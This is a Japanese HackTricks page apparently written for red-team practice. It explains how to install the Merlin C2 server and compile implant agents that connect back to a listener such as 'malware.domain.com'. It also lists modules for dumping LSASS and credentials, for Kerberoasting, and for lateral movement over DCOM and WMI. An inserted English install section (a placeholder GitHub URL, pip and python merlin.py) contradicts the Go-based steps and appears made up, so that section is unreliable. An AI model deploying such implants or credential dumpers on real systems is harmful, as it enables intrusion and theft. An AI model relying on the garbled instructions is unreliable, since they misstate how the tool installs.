hacktricks/backdoors/merlin.md

7.4 KiB
Raw Blame History

ゼロからヒーローまでのAWSハッキングを学ぶ htARTEHackTricks AWS Red Team Expert

HackTricksをサポートする他の方法

インストール

GOをインストール

#Download GO package from: https://golang.org/dl/
#Decompress the packe using:
tar -C /usr/local -xzf go$VERSION.$OS-$ARCH.tar.gz

#Change /etc/profile
Add ":/usr/local/go/bin" to PATH
Add "export GOPATH=$HOME/go"
Add "export GOBIN=$GOPATH/bin"

source /etc/profile

Merlinのインストール

Install Merlin by following these steps:

  1. Clone the Merlin repository from GitHub:
git clone https://github.com/username/merlin.git
  1. Change into the Merlin directory:
cd merlin
  1. Install the required dependencies using pip:
pip install -r requirements.txt
  1. Run Merlin:
python merlin.py

Now you have successfully installed Merlin on your system.

go get https://github.com/Ne0nd0g/merlin/tree/dev #It is recommended to use the developer branch
cd $GOPATH/src/github.com/Ne0nd0g/merlin/

Merlinサーバーの起動

go run cmd/merlinserver/main.go -i

マーリン エージェント

事前にコンパイルされたエージェントをダウンロードできます。

エージェントのコンパイル

メインフォルダー $GOPATH/src/github.com/Ne0nd0g/merlin/ に移動します。

#User URL param to set the listener URL
make #Server and Agents of all
make windows #Server and Agents for Windows
make windows-agent URL=https://malware.domain.com:443/ #Agent for windows (arm, dll, linux, darwin, javascript, mips)

マニュアルコンパイルエージェント

GOOS=windows GOARCH=amd64 go build -ldflags "-X main.url=https://10.2.0.5:443" -o agent.exe main.g

モジュール

悪いニュースは、Merlinが使用するすべてのモジュールがソースGithubからダウンロードされ、ディスクに保存されることです。よく知られたモジュールを使用する際には注意してください。Windows Defenderに検出される可能性があります

SafetyKatz --> 改変されたMimikatz。LSASSをファイルにダンプして、:sekurlsa::logonpasswordsをそのファイルに実行します
SharpDump --> 指定されたプロセスIDのminidumpデフォルトではLSASS最終ファイルの拡張子は.gzですが、実際には.binですが、.gzファイルです
SharpRoast --> Kerberoast動作しません
SeatBelt --> CSのローカルセキュリティテスト動作しませんhttps://github.com/GhostPack/Seatbelt/blob/master/Seatbelt/Program.cs
Compiler-CSharp --> csc.exe /unsafeを使用してコンパイル
Sharp-Up --> PowerupでC#のすべてのチェックを実行します(動作します)
Inveigh --> PowerShellADIDNS/LLMNR/mDNS/NBNSのスプーファーおよび中間者ツール動作しません、読み込みが必要https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Inveigh.ps1
Invoke-InternalMonologue --> 利用可能なすべてのユーザーを偽装し、各ユーザーのチャレンジレスポンスを取得します各ユーザーのNTLMハッシュ悪いURL
Invoke-PowerThIEf --> IExplorerからフォームを盗み出すか、JSを実行するか、そのプロセスにDLLをインジェクトします動作しませんおよびPSも動作しないようですhttps://github.com/nettitude/Invoke-PowerThIEf/blob/master/Invoke-PowerThIEf.ps1
LaZagneForensic --> ブラウザのパスワードを取得します(機能しますが、出力ディレクトリを表示しません)
dumpCredStore --> Win32資格情報マネージャAPIhttps://github.com/zetlen/clortho/blob/master/CredMan.ps1https://www.digitalcitizen.life/credential-manager-where-windows-stores-passwords-other-login-details
Get-InjectedThread --> 実行中のプロセスでクラシックインジェクションを検出しますClassic InjectionOpenProcess、VirtualAllocEx、WriteProcessMemory、CreateRemoteThread動作しません
Get-OSTokenInformation --> 実行中のプロセスとスレッドのトークン情報を取得します(ユーザー、グループ、特権、所有者... https://docs.microsoft.com/es-es/windows/desktop/api/winnt/ne-winnt-_token_information_class
Invoke-DCOM --> DCOM経由で他のコンピューターでコマンドを実行しますhttp://www.enigma0x3.net.https://enigma0x3.net/2017/09/11/lateral-movement-using-excel-application-and-dcom/
Invoke-DCOMPowerPointPivot --> PowerPoint COMオブジェクトADDinを悪用して他のPCでコマンドを実行します
Invoke-ExcelMacroPivot --> ExcelのDCOMを悪用して他のPCでコマンドを実行します
Find-ComputersWithRemoteAccessPolicies --> (動作しません)(https://labs.mwrinfosecurity.com/blog/enumerating-remote-access-policies-through-gpo/
Grouper --> グループポリシーの最も興味深い部分をすべてダンプし、それらを検索して攻撃可能なものを探します非推奨Grouper2を見てみてください、本当に素敵です
Invoke-WMILM --> 横断移動のためのWMI
Get-GPPPassword --> groups.xml、scheduledtasks.xml、services.xml、datasources.xmlを検索して平文パスワードを返しますドメイン内
Invoke-Mimikatz --> Mimikatzを使用しますデフォルトのクレデンシャルをダンプ
PowerUp --> https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc
Find-BadPrivilege --> コンピューターのユーザーの特権をチェックします
Find-PotentiallyCrackableAccounts --> SPNに関連付けられたユーザーアカウントに関する情報を取得しますKerberoasting
psgetsystem --> getsystem

持続性モジュールはチェックしていません

要約

このツールの感触とポテンシャルが本当に気に入っています。
ツールがサーバーからモジュールをダウンロードし始め、スクリプトをダウンロードする際に回避機能を統合することを期待しています。